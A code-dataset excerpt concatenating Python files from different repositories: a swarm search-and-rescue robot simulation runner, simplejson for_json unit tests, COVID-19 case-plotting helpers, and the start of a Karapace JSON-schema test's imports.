90b759e437a1233b44e67f803ee1ef47332c1944 | 15,479 | py | Python | runner.py | kevintsq/SwarmSearchSimulation | 806a5a173217c39cd015caced43d584da4ad8b3d | [
"MIT"
] | null | null | null | runner.py | kevintsq/SwarmSearchSimulation | 806a5a173217c39cd015caced43d584da4ad8b3d | [
"MIT"
] | null | null | null | runner.py | kevintsq/SwarmSearchSimulation | 806a5a173217c39cd015caced43d584da4ad8b3d | [
"MIT"
] | 2 | 2021-09-22T11:07:44.000Z | 2021-12-29T14:16:49.000Z | import pickle
import sys
from multiprocessing import Pool, Lock
from logger import *
from robot_manager import *
lock = Lock()
class AbstractRunner(ABC):
def __init__(self):
with lock:
self.logger = Logger(reset=True)
# self.logger.start()
@abstractmethod
def run(self, *args, **kwargs):
pass
def run(i, site_width, site_height, generator, depart_from_edge, robot_type, robot_cnt,
max_search_action_cnt, max_return_action_cnt):
try:
with lock:
logger = Logger()
layout = Layout.from_generator(generator, enable_display=False, depart_from_edge=depart_from_edge)
manager = RandomSpreadingRobotManager(robot_type, logger, layout, robot_cnt,
depart_from_edge=depart_from_edge, initial_gather_mode=False)
while not (layout or manager.action_count >= max_search_action_cnt):
manager.update()
if manager.action_count % 100 == 0:
with lock:
logger.log(i, site_width, site_height, generator.room_cnt, generator.injuries,
'Edge' if depart_from_edge else 'Center', robot_type.__name__, robot_cnt,
'Search', *layout.report(), 0, *manager.report_search())
with lock:
logger.log(i, site_width, site_height, generator.room_cnt, generator.injuries,
'Edge' if depart_from_edge else 'Center', robot_type.__name__, robot_cnt,
'SearchFinished', *layout.report(), 0, *manager.report_search())
if robot_type != Robot and robot_type != RobotUsingGas:
manager.enter_gathering_mode()
while not (manager or manager.action_count - manager.first_injury_action_count >= max_return_action_cnt):
manager.update()
if manager.action_count % 100 == 0:
with lock:
logger.log(i, site_width, site_height, generator.room_cnt, generator.injuries,
'Edge' if depart_from_edge else 'Center', robot_type.__name__, robot_cnt,
'Return', *layout.report(), manager.report_gather(), *manager.report_search())
with lock:
logger.log(i, site_width, site_height, generator.room_cnt, generator.injuries,
'Edge' if depart_from_edge else 'Center', robot_type.__name__, robot_cnt,
'ReturnFinished', *layout.report(), manager.report_gather(), *manager.report_search())
except:
with lock:
if not os.path.exists("debug"):
os.mkdir("debug")
with open(f"debug/gen_dbg_{i}.pkl", "wb") as file:
pickle.dump(generator, file)
import traceback
traceback.print_exc()
finally:
logger.close()
class StatisticRunner(AbstractRunner):
def __init__(self):
super().__init__()
def run(self):
site_width, site_height, room_cnt, injury_cnt, max_search_action_cnt, max_return_action_cnt =\
120, 60, 120, 10, 4000, 1000
workers = []
with Pool() as p:
for i in range(config.MAX_ITER):
try:
generator = SiteGenerator(site_width, site_height, room_cnt, injury_cnt)
except:
print(f"Generation {i} failed. Skipped.", file=sys.stderr)
continue
for robot_cnt in (2, 4, 6, 8, 10):
for robot_type in (RandomRobot, Robot, RobotUsingSound, RobotUsingGas, RobotUsingGasAndSound):
workers.append(p.apply_async(run, (i, site_width, site_height, generator, False, robot_type,
robot_cnt, max_search_action_cnt, max_return_action_cnt)))
workers.append(p.apply_async(run, (i, site_width, site_height, generator, True, robot_type,
robot_cnt, max_search_action_cnt, max_return_action_cnt)))
cnt = len(workers)
for i, worker in enumerate(workers):
worker.wait()
print(f"{i + 1} of {cnt} ({(i + 1) * 100 / cnt: .2f}%) finished with status {worker.get()}.")
# self.logger.stop()
class GatheringStatisticRunner(AbstractRunner):
def __init__(self):
super().__init__()
def run(self):
robot_cnt = 8
# self.logger.info("site_width,site_height,room_cnt,robot_type,robot_cnt,total_action_cnt,total_returned_cnt")
for i in range(config.MAX_ITER):
site_width, site_height, room_cnt, injury_cnt, robot_type = 120, 60, 120, 1, RobotUsingGasAndSound
try:
generator = SiteGenerator(site_width, site_height, room_cnt, injury_cnt)
except:
print(f"Generation {i} failed. Skipped.", file=sys.stderr)
continue
try:
layout = Layout.from_generator(generator, enable_display=False, depart_from_edge=False)
manager = RandomSpreadingRobotManager(robot_type, self.logger, layout, robot_cnt,
depart_from_edge=False, initial_gather_mode=True)
while True:
if manager or manager.first_injury_action_count != 0 and \
manager.action_count - manager.first_injury_action_count >= 1000:
# all(robots) have mission-completed
# self.logger.info(f"{site_width},{site_height},{generator.room_cnt},{robot_type.__name__},"
# f"{robot_cnt},{manager.report_gather()}")
break
manager.update()
except:
if not os.path.exists("debug"):
os.mkdir("debug")
with open(f"debug/gen_dbg_{i}.pkl", "wb") as file:
pickle.dump(generator, file)
import traceback
traceback.print_exc()
# self.logger.stop()
class DebugRunner(AbstractRunner):
def __init__(self):
super().__init__()
pygame.init()
pygame.display.set_caption("Simulation")
def run(self):
with open("debug/gen_dbg.pkl", "rb") as file:
generator: SiteGenerator = pickle.load(file)
layout = Layout.from_generator(generator, depart_from_edge=False)
manager = SpreadingRobotManager(RobotUsingGasAndSound, self.logger, layout, 8,
depart_from_edge=False, initial_gather_mode=False)
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
# self.logger.stop()
exit()
elif event.type == KEYDOWN:
if event.key == K_SPACE:
layout.update()
manager.update()
pygame.display.update()
class TestRunner(AbstractRunner):
def __init__(self):
super().__init__()
pygame.init()
pygame.display.set_caption("Simulation")
def run(self):
layout = Layout.from_file("assets/test.lay")
manager = SpreadingRobotManager(RobotUsingGasAndSound, self.logger, layout, 1,
depart_from_edge=False, initial_gather_mode=False)
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
# self.logger.stop()
exit()
elif event.type == KEYDOWN:
if event.key == K_SPACE:
layout.update()
manager.update()
pygame.display.update()
class PresentationRunner(AbstractRunner):
def __init__(self):
super().__init__()
pygame.init()
pygame.display.set_caption("Simulation")
def run(self):
generator = SiteGenerator(120, 60, 120, 10)
try:
layout = Layout.from_generator(generator, depart_from_edge=False)
manager = RandomSpreadingRobotManager(RobotUsingGasAndSound, self.logger, layout, 8,
depart_from_edge=False, initial_gather_mode=False)
clock = pygame.time.Clock()
frame_rate = config.DISPLAY_FREQUENCY
while True:
for event in pygame.event.get():
if event.type == QUIT:
if not os.path.exists("debug"):
os.mkdir("debug")
with open("debug/gen_dbg.pkl", "wb") as file:
pickle.dump(generator, file)
pygame.quit()
# self.logger.stop()
exit()
elif event.type == KEYDOWN:
if event.key == K_SPACE:
config.PAUSE = not config.PAUSE
if event.key == K_UP and frame_rate < config.DISPLAY_FREQUENCY:
frame_rate += 5
if event.key == K_DOWN and frame_rate > 5:
frame_rate -= 5
if not config.PAUSE:
if all(layout.rooms) and all(layout.injuries): # have been visited and rescued
config.PAUSE = True
layout.update()
manager.update()
pygame.display.update()
# clock.tick(frame_rate)
except:
if not os.path.exists("debug"):
os.mkdir("debug")
with open("debug/gen_dbg.pkl", "wb") as file:
pickle.dump(generator, file)
import traceback
traceback.print_exc()
class DebugPresentationRunner(AbstractRunner):
def __init__(self):
super().__init__()
pygame.init()
pygame.display.set_caption("Simulation")
def run(self):
with open("debug/gen_dbg.pkl", "rb") as file:
generator: SiteGenerator = pickle.load(file)
layout = Layout.from_generator(generator, depart_from_edge=False)
manager = RandomSpreadingRobotManager(RobotUsingGas, self.logger, layout, 10,
depart_from_edge=False, initial_gather_mode=False)
clock = pygame.time.Clock()
frame_rate = config.DISPLAY_FREQUENCY
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
# self.logger.stop()
exit()
elif event.type == KEYDOWN:
if event.key == K_SPACE:
config.PAUSE = not config.PAUSE
if event.key == K_UP and frame_rate < config.DISPLAY_FREQUENCY:
frame_rate += 5
if event.key == K_DOWN and frame_rate > 5:
frame_rate -= 5
if all(layout.rooms) and all(layout.injuries): # have been visited and rescued
config.PAUSE = True
if not config.PAUSE:
layout.update()
manager.update()
pygame.display.update()
clock.tick(frame_rate)
class StatisticPresentationRunner(AbstractRunner):
def __init__(self):
super().__init__()
pygame.init()
pygame.display.set_caption("Simulation")
def run(self):
robot_cnt = 2
site_width, site_height, room_cnt, injury_cnt, robot_type = 120, 60, 120, 10, RobotUsingGasAndSound
generator = SiteGenerator(site_width, site_height, room_cnt, injury_cnt)
try:
layout = Layout.from_generator(generator, depart_from_edge=False)
manager = RandomSpreadingRobotManager(robot_type, self.logger, layout, robot_cnt,
depart_from_edge=False, initial_gather_mode=False)
clock = pygame.time.Clock()
frame_rate = config.DISPLAY_FREQUENCY
while not (layout or manager.action_count >= 500):
for event in pygame.event.get():
if event.type == QUIT:
if not os.path.exists("debug"):
os.mkdir("debug")
with open(f"debug/gen_dbg.pkl", "wb") as file:
pickle.dump(generator, file)
pygame.quit()
# self.logger.stop()
exit()
elif event.type == KEYDOWN:
if event.key == K_SPACE:
config.PAUSE = not config.PAUSE
if event.key == K_UP and frame_rate < config.DISPLAY_FREQUENCY:
frame_rate += 5
if event.key == K_DOWN and frame_rate > 5:
frame_rate -= 5
if not config.PAUSE:
layout.update()
manager.update()
pygame.display.update()
clock.tick(frame_rate)
manager.enter_gathering_mode()
while not (manager or manager.action_count - manager.first_injury_action_count >= 500):
for event in pygame.event.get():
if event.type == QUIT:
if not os.path.exists("debug"):
os.mkdir("debug")
with open(f"debug/gen_dbg.pkl", "wb") as file:
pickle.dump(generator, file)
pygame.quit()
# self.logger.stop()
exit()
elif event.type == KEYDOWN:
if event.key == K_SPACE:
config.PAUSE = not config.PAUSE
if event.key == K_UP and frame_rate < config.DISPLAY_FREQUENCY:
frame_rate += 5
if event.key == K_DOWN and frame_rate > 5:
frame_rate -= 5
if not config.PAUSE:
layout.update()
manager.update()
pygame.display.update()
clock.tick(frame_rate)
while True:
for event in pygame.event.get():
if event.type == QUIT:
if not os.path.exists("debug"):
os.mkdir("debug")
with open(f"debug/gen_dbg.pkl", "wb") as file:
pickle.dump(generator, file)
pygame.quit()
# self.logger.stop()
exit()
except Exception:
if not os.path.exists("debug"):
os.mkdir("debug")
with open(f"debug/gen_dbg.pkl", "wb") as file:
pickle.dump(generator, file)
import traceback
traceback.print_exc()
if __name__ == '__main__':
runner = PresentationRunner()
runner.run()
| 44.866667 | 118 | 0.52077 | 1,569 | 15,479 | 4.905035 | 0.115997 | 0.026897 | 0.036383 | 0.037032 | 0.836798 | 0.828093 | 0.803664 | 0.777547 | 0.756757 | 0.740255 | 0 | 0.010447 | 0.387816 | 15,479 | 344 | 119 | 44.997093 | 0.80171 | 0.03663 | 0 | 0.778523 | 0 | 0.003356 | 0.038673 | 0.00282 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057047 | false | 0.003356 | 0.030201 | 0 | 0.114094 | 0.02349 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2906bdb1451768f545267a78099698370a805f2f | 4,191 | py | Python | simplejson/tests/test_for_json.py | shakefu/simplejson | ad58a553fbc921e76700bc9d252b6fddcc70f51a | [
"AFL-2.1"
] | null | null | null | simplejson/tests/test_for_json.py | shakefu/simplejson | ad58a553fbc921e76700bc9d252b6fddcc70f51a | [
"AFL-2.1"
] | null | null | null | simplejson/tests/test_for_json.py | shakefu/simplejson | ad58a553fbc921e76700bc9d252b6fddcc70f51a | [
"AFL-2.1"
] | 1 | 2021-09-05T22:09:31.000Z | 2021-09-05T22:09:31.000Z | import unittest
import simplejson as json
class ForJson(object):
def for_json(self):
return {'for_json': 1}
class NestedForJson(object):
def for_json(self):
return {'nested': ForJson()}
class ForJsonList(object):
def for_json(self):
return ['list']
class DictForJson(dict):
def for_json(self):
return {'alpha': 1}
class ListForJson(list):
def for_json(self):
return ['list']
class TestForJsonWithSpeedups(unittest.TestCase):
def setUp(self):
if not json.encoder.c_make_encoder:
raise unittest.SkipTest("No speedups.")
@staticmethod
def _dump(obj):
return json.dumps(obj, for_json=True)
def test_for_json_encodes_stand_alone_object(self):
self.assertEqual(self._dump(ForJson()), '{"for_json": 1}')
def test_for_json_encodes_object_nested_in_dict(self):
self.assertEqual(self._dump({'hooray': ForJson()}), '{"hooray": '
'{"for_json": 1}}')
def test_for_json_encodes_object_nested_in_list_within_dict(self):
self.assertEqual(self._dump({'list': [0, ForJson(), 2, 3]}),
'{"list": [0, {"for_json": 1}, 2, 3]}')
def test_for_json_encodes_object_nested_within_object(self):
self.assertEqual(self._dump(NestedForJson()),
'{"nested": {"for_json": 1}}')
def test_for_json_encodes_list(self):
self.assertEqual(self._dump(ForJsonList()), '["list"]')
def test_for_json_encodes_list_within_object(self):
self.assertEqual(self._dump({'nested': ForJsonList()}),
'{"nested": ["list"]}')
def test_for_json_encodes_dict_subclass(self):
self.assertEqual(self._dump(DictForJson(a=1)), '{"alpha": 1}')
def test_for_json_encodes_list_subclass(self):
self.assertEqual(self._dump(ListForJson(['l'])), '["list"]')
def tset_for_json_ignored_if_not_true_with_dict_subclass(self):
self.assertEqual(json.dumps(DictForJson(a=1)), '{"a": 1}')
def test_for_json_ignored_if_not_true_with_list_subclass(self):
self.assertEqual(json.dumps(ListForJson(['l'])), '["l"]')
def test_raises_typeerror_if_for_json_not_true_with_object(self):
self.assertRaises(TypeError, json.dumps, ForJson())
class TestForJsonWithoutSpeedups(unittest.TestCase):
def setUp(self):
if json.encoder.c_make_encoder:
json._toggle_speedups(False)
def tearDown(self):
if json.encoder.c_make_encoder:
json._toggle_speedups(True)
@staticmethod
def _dump(obj):
return json.dumps(obj, for_json=True)
def test_for_json_encodes_stand_alone_object(self):
self.assertEqual(self._dump(ForJson()), '{"for_json": 1}')
def test_for_json_encodes_object_nested_in_dict(self):
self.assertEqual(self._dump({'hooray': ForJson()}), '{"hooray": '
'{"for_json": 1}}')
def test_for_json_encodes_object_nested_in_list_within_dict(self):
self.assertEqual(self._dump({'list': [0, ForJson(), 2, 3]}),
'{"list": [0, {"for_json": 1}, 2, 3]}')
def test_for_json_encodes_object_nested_within_object(self):
self.assertEqual(self._dump(NestedForJson()),
'{"nested": {"for_json": 1}}')
def test_for_json_encodes_list(self):
self.assertEqual(self._dump(ForJsonList()), '["list"]')
def test_for_json_encodes_list_within_object(self):
self.assertEqual(self._dump({'nested': ForJsonList()}),
'{"nested": ["list"]}')
def test_for_json_encodes_dict_subclass(self):
self.assertEqual(self._dump(DictForJson(a=1)), '{"alpha": 1}')
def test_for_json_encodes_list_subclass(self):
self.assertEqual(self._dump(ListForJson(['l'])), '["list"]')
def tset_for_json_ignored_if_not_true_with_dict_subclass(self):
self.assertEqual(json.dumps(DictForJson(a=1)), '{"a": 1}')
def test_for_json_ignored_if_not_true_with_list_subclass(self):
self.assertEqual(json.dumps(ListForJson(['l'])), '["l"]')
def test_raises_typeerror_if_for_json_not_true_with_object(self):
self.assertRaises(TypeError, json.dumps, ForJson())
| 33 | 73 | 0.661656 | 534 | 4,191 | 4.825843 | 0.116105 | 0.103221 | 0.147458 | 0.097788 | 0.902212 | 0.885526 | 0.842064 | 0.819558 | 0.819558 | 0.819558 | 0 | 0.008844 | 0.190647 | 4,191 | 126 | 74 | 33.261905 | 0.750884 | 0 | 0 | 0.802326 | 0 | 0 | 0.097136 | 0 | 0 | 0 | 0 | 0 | 0.255814 | 1 | 0.372093 | false | 0 | 0.023256 | 0.081395 | 0.55814 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2914d34e167c17c9cbadf1dd02a9f1c73d3db886 | 9,663 | py | Python | utils/plot.py | secregister01/2020-04-13_COVID19-N20 | 145e914d9288b323a7c249f00eaa7e649e6b2049 | [
"Unlicense"
] | 4 | 2020-04-21T00:30:15.000Z | 2020-05-06T18:53:13.000Z | utils/plot.py | secregister01/2020-04-13_COVID19-N20 | 145e914d9288b323a7c249f00eaa7e649e6b2049 | [
"Unlicense"
] | 1 | 2020-04-28T21:05:18.000Z | 2020-04-29T20:47:43.000Z | utils/plot.py | secregister01/2020-04-13_COVID19-N20 | 145e914d9288b323a7c249f00eaa7e649e6b2049 | [
"Unlicense"
] | 1 | 2020-04-25T17:49:18.000Z | 2020-04-25T17:49:18.000Z | from utils import *
from utils.paths import *
import utils.paths as p
countries, index_country, country_index = get_countries()
states, index_state, state_index = get_us_states()
#---------------------------Countries--------------------------------------
# plot cumulative cases multicountry
def plot_cumulative_multi_country(selected_countries):
assert p.DATE == "DateWorld"
plt.clf()
countries = [index_country[c] for c in selected_countries]
plt.title("Cumulative Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Confirmed Cases")
for country in countries:
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.plot(df_country["tagged_day"], df_country["confirmed"], label=country)
plt.legend(countries, loc='center left', bbox_to_anchor=(1, 0.5))
def plot_normalized_cumulative_multi_country(selected_countries):
assert p.DATE == "DateWorld"
plt.clf()
countries = [index_country[c] for c in selected_countries]
plt.title("Normalized Cumulative Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Normalized Confirmed Cases")
for country in countries:
population = country_population[country]
area = country_area[country]
density = population / area
#display(f"{country},{population},{area},{density}")
if density > 0:
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.plot(df_country["tagged_day"], df_country["confirmed"]/density, label=country)
plt.legend(countries, loc='center left', bbox_to_anchor=(1, 0.5))
# plot new comfirmed cases multicountry
def plot_new_confirmed_multi_country(selected_countries):
assert p.DATE == "DateWorld"
plt.clf()
countries = [index_country[c] for c in selected_countries]
plt.title("New Daily Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("New Confirmed Cases")
for country in countries:
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.plot(df_country["tagged_day"], df_country["new_confirmed"], label=country)
plt.legend(countries, loc='center left', bbox_to_anchor=(1, 0.5))
# plot deaths cases multicountry
def plot_deaths_multi_country(selected_countries):
assert p.DATE == "DateWorld"
plt.clf()
countries = [index_country[c] for c in selected_countries]
plt.title("Cumulative Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Death Cases")
for country in countries:
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.plot(df_country["tagged_day"], df_country["deaths"], label=country)
plt.legend(countries, loc='center left', bbox_to_anchor=(1, 0.5))
def plot_normalized_deaths_multi_country(selected_countries):
assert p.DATE == "DateWorld"
plt.clf()
countries = [index_country[c] for c in selected_countries]
plt.title("Normalized Cumulative Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Normalized Death Cases")
for country in countries:
population = country_population[country]
area = country_area[country]
density = population / area
if density > 0:
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.plot(df_country["tagged_day"], df_country["deaths"]/density, label=country)
plt.legend(countries, loc='center left', bbox_to_anchor=(1, 0.5))
def plot_new_deaths_multi_country(selected_countries):
assert p.DATE == "DateWorld"
plt.clf()
countries = [index_country[c] for c in selected_countries]
plt.title("Daily Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Daily Death Cases")
for country in countries:
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.plot(df_country["tagged_day"], df_country["new_deaths"], label=country)
plt.legend(countries, loc='center left', bbox_to_anchor=(1, 0.5))
def plot_cumulative_country_save(country_index):
assert p.DATE == "DateWorld"
country = index_country[country_index]
df = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.clf()
plt.title(f"{country} Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Confirmed Cases")
plt.bar(df["tagged_day"], df["confirmed"])
plt.savefig(f"{p.CUM}/{country}.jpg")
plt.clf()
def plot_deaths_country_save(country_index):
assert p.DATE == "DateWorld"
country = index_country[country_index]
df = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.title(f"{country} Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Death Cases")
plt.bar(df["tagged_day"], df["deaths"])
plt.savefig(f"{p.DEA}/{country}.jpg")
plt.clf()
def plot_new_confirmed_new_deaths_country(country_index):
assert p.DATE == "DateWorld"
country = index_country[country_index]
df_country = pd.read_csv(f"{p.DRP}/{country}.csv")
plt.clf()
# plt.ylabel("Cases")
plt.title("Title")
plt.subplot(211)
# plt.title(f"{country} Daily New Confirmed Cases")
plt.bar(df_country['tagged_day'], df_country['new_confirmed'])
plt.ylabel("New Confirmed Cases")
plt.subplot(212)
#plt.title(f"{country} Daily Death Cases")
plt.bar(df_country['tagged_day'], df_country['new_deaths'])
plt.xlabel(f"Day in {country} since N=20")
plt.ylabel("New Death Cases")
# plt.legend(['Daily New Confirmed Cases', 'Daily Death Cases'], bbox_to_anchor=(1, 0.5))
#---------------------------US States--------------------------------------
# plot cumulative cases multistate
def plot_cumulative_multi_state(selected_states):
assert p.DATE == "DateUS"
plt.clf()
states = [index_state[c] for c in selected_states]
plt.title("Cumulative Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Confirmed Cases")
for state in states:
df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.plot(df_state["tagged_day"], df_state["confirmed"], label=state)
plt.legend(states, loc='center left', bbox_to_anchor=(1, 0.5))
# def plot_normalized_cumulative_multi_state(selected_states):
# assert p.DATE == "DateUS"
# plt.clf()
# states = [index_state[c] for c in selected_states]
# plt.title("Normalized Cumulative Confirmed Cases Since N=20")
# plt.xlabel("Day")
# plt.ylabel("Normalized Confirmed Cases")
# for state in states:
# population = state_population[state]
# area = state_area[state]
# density = population / area
# #display(f"{state},{population},{area},{density}")
# if density > 0:
# df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
# plt.plot(df_state["tagged_day"], df_state["confirmed"]/density, label=state)
# plt.legend(states, loc='center left', bbox_to_anchor=(1, 0.5))
# plot new comfirmed cases multistate
def plot_new_confirmed_multi_state(selected_states):
assert p.DATE == "DateUS"
plt.clf()
states = [index_state[c] for c in selected_states]
plt.title("New Daily Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("New Confirmed Cases")
for state in states:
df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.plot(df_state["tagged_day"], df_state["new_confirmed"], label=state)
plt.legend(states, loc='center left', bbox_to_anchor=(1, 0.5))
# plot deaths cases multistate
def plot_deaths_multi_state(selected_states):
assert p.DATE == "DateUS"
plt.clf()
states = [index_state[c] for c in selected_states]
plt.title("Cumulative Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Death Cases")
for state in states:
df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.plot(df_state["tagged_day"], df_state["deaths"], label=state)
plt.legend(states, loc='center left', bbox_to_anchor=(1, 0.5))
# def plot_normalized_deaths_multi_state(selected_states):
# assert p.DATE == "DateUS"
# plt.clf()
# states = [index_state[c] for c in selected_states]
# plt.title("Normalized Cumulative Death Cases Since N=20")
# plt.xlabel("Day")
# plt.ylabel("Normalized Death Cases")
# for state in states:
# population = state_population[state]
# area = state_area[state]
# density = population / area
# if density > 0:
# df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
# plt.plot(df_state["tagged_day"], df_state["deaths"]/density, label=state)
# plt.legend(states, loc='center left', bbox_to_anchor=(1, 0.5))
def plot_new_deaths_multi_state(selected_states):
assert p.DATE == "DateUS"
plt.clf()
states = [index_state[c] for c in selected_states]
plt.title("Daily Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Daily Death Cases")
for state in states:
df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.plot(df_state["tagged_day"], df_state["new_deaths"], label=state)
plt.legend(states, loc='center left', bbox_to_anchor=(1, 0.5))
def plot_cumulative_state_save(state_index):
assert p.DATE == "DateUS"
state = index_state[state_index]
df = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.clf()
plt.title(f"{state} Confirmed Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Confirmed Cases")
plt.bar(df["tagged_day"], df["confirmed"])
plt.savefig(f"{p.CUM}/{state}.jpg")
plt.clf()
def plot_deaths_state_save(state_index):
assert p.DATE == "DateUS"
state = index_state[state_index]
df = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.title(f"{state} Death Cases Since N=20")
plt.xlabel("Day")
plt.ylabel("Death Cases")
plt.bar(df["tagged_day"], df["deaths"])
plt.savefig(f"{p.DEA}/{state}.jpg")
plt.clf()
def plot_new_confirmed_new_deaths_state(state_index):
assert p.DATE == "DateUS"
state = index_state[state_index]
df_state = pd.read_csv(f"{p.DRP}/{state}.csv")
plt.clf()
# plt.ylabel("Cases")
plt.title("Title")
plt.subplot(211)
# plt.title(f"{state} Daily New Confirmed Cases")
plt.bar(df_state['tagged_day'], df_state['new_confirmed'])
plt.ylabel("New Confirmed Cases")
plt.subplot(212)
#plt.title(f"{state} Daily Death Cases")
plt.bar(df_state['tagged_day'], df_state['new_deaths'])
plt.xlabel(f"Day in {state} since N=20")
plt.ylabel("New Death Cases")
# plt.legend(['Daily New Confirmed Cases', 'Daily Death Cases'], bbox_to_anchor=(1, 0.5))
| 36.05597 | 90 | 0.714788 | 1,496 | 9,663 | 4.446524 | 0.050802 | 0.031118 | 0.033073 | 0.029765 | 0.946332 | 0.934606 | 0.919573 | 0.903638 | 0.901834 | 0.89071 | 0 | 0.010979 | 0.11394 | 9,663 | 268 | 91 | 36.05597 | 0.765943 | 0.211322 | 0 | 0.743456 | 0 | 0 | 0.24693 | 0.030503 | 0 | 0 | 0 | 0 | 0.08377 | 1 | 0.08377 | false | 0 | 0.015707 | 0 | 0.099476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
294abc66c3ba6656699878f26540ce0af1481571 | 44,910 | py | Python | tests/unit/test_json_schema.py | galvo/karapace | fa4b455a7153a560d7cf0a3530b82f25bd6dd8a4 | [
"Apache-2.0"
] | 180 | 2019-01-16T15:35:36.000Z | 2022-03-29T10:01:10.000Z | tests/unit/test_json_schema.py | galvo/karapace | fa4b455a7153a560d7cf0a3530b82f25bd6dd8a4 | [
"Apache-2.0"
] | 175 | 2020-03-19T12:53:05.000Z | 2022-03-31T16:26:55.000Z | tests/unit/test_json_schema.py | galvo/karapace | fa4b455a7153a560d7cf0a3530b82f25bd6dd8a4 | [
"Apache-2.0"
] | 32 | 2019-01-16T16:12:25.000Z | 2022-03-30T07:14:57.000Z | from jsonschema import Draft7Validator
from karapace.avro_compatibility import SchemaCompatibilityResult
from karapace.compatibility.jsonschema.checks import compatibility
from tests.schemas.json_schemas import (
A_DINT_B_DINT_OBJECT_SCHEMA, A_DINT_B_INT_OBJECT_SCHEMA, A_DINT_B_NUM_C_DINT_OBJECT_SCHEMA, A_DINT_B_NUM_OBJECT_SCHEMA,
A_DINT_OBJECT_SCHEMA, A_INT_B_DINT_OBJECT_SCHEMA, A_INT_B_DINT_REQUIRED_OBJECT_SCHEMA, A_INT_B_INT_OBJECT_SCHEMA,
A_INT_B_INT_REQUIRED_OBJECT_SCHEMA, A_INT_OBJECT_SCHEMA, A_INT_OPEN_OBJECT_SCHEMA, A_OBJECT_SCHEMA, ARRAY_OF_INT_SCHEMA,
ARRAY_OF_NUMBER_SCHEMA, ARRAY_OF_POSITIVE_INTEGER, ARRAY_OF_POSITIVE_INTEGER_THROUGH_REF, ARRAY_OF_STRING_SCHEMA,
ARRAY_SCHEMA, B_DINT_OPEN_OBJECT_SCHEMA, B_INT_OBJECT_SCHEMA, B_INT_OPEN_OBJECT_SCHEMA, B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
B_NUM_C_INT_OBJECT_SCHEMA, B_NUM_C_INT_OPEN_OBJECT_SCHEMA, BOOLEAN_SCHEMA, BOOLEAN_SCHEMAS, EMPTY_OBJECT_SCHEMA,
EMPTY_SCHEMA, ENUM_AB_SCHEMA, ENUM_ABC_SCHEMA, ENUM_BC_SCHEMA, EVERY_TYPE_SCHEMA,
EXCLUSIVE_MAXIMUM_DECREASED_INTEGER_SCHEMA, EXCLUSIVE_MAXIMUM_DECREASED_NUMBER_SCHEMA, EXCLUSIVE_MAXIMUM_INTEGER_SCHEMA,
EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA, EXCLUSIVE_MINIMUM_INCREASED_INTEGER_SCHEMA, EXCLUSIVE_MINIMUM_INCREASED_NUMBER_SCHEMA,
EXCLUSIVE_MINIMUM_INTEGER_SCHEMA, EXCLUSIVE_MINIMUM_NUMBER_SCHEMA, FALSE_SCHEMA, INT_SCHEMA, MAX_ITEMS_DECREASED_SCHEMA,
MAX_ITEMS_SCHEMA, MAX_LENGTH_DECREASED_SCHEMA, MAX_LENGTH_SCHEMA, MAX_PROPERTIES_DECREASED_SCHEMA, MAX_PROPERTIES_SCHEMA,
MAXIMUM_DECREASED_INTEGER_SCHEMA, MAXIMUM_DECREASED_NUMBER_SCHEMA, MAXIMUM_INTEGER_SCHEMA, MAXIMUM_NUMBER_SCHEMA,
MIN_ITEMS_INCREASED_SCHEMA, MIN_ITEMS_SCHEMA, MIN_LENGTH_INCREASED_SCHEMA, MIN_LENGTH_SCHEMA, MIN_PATTERN_SCHEMA,
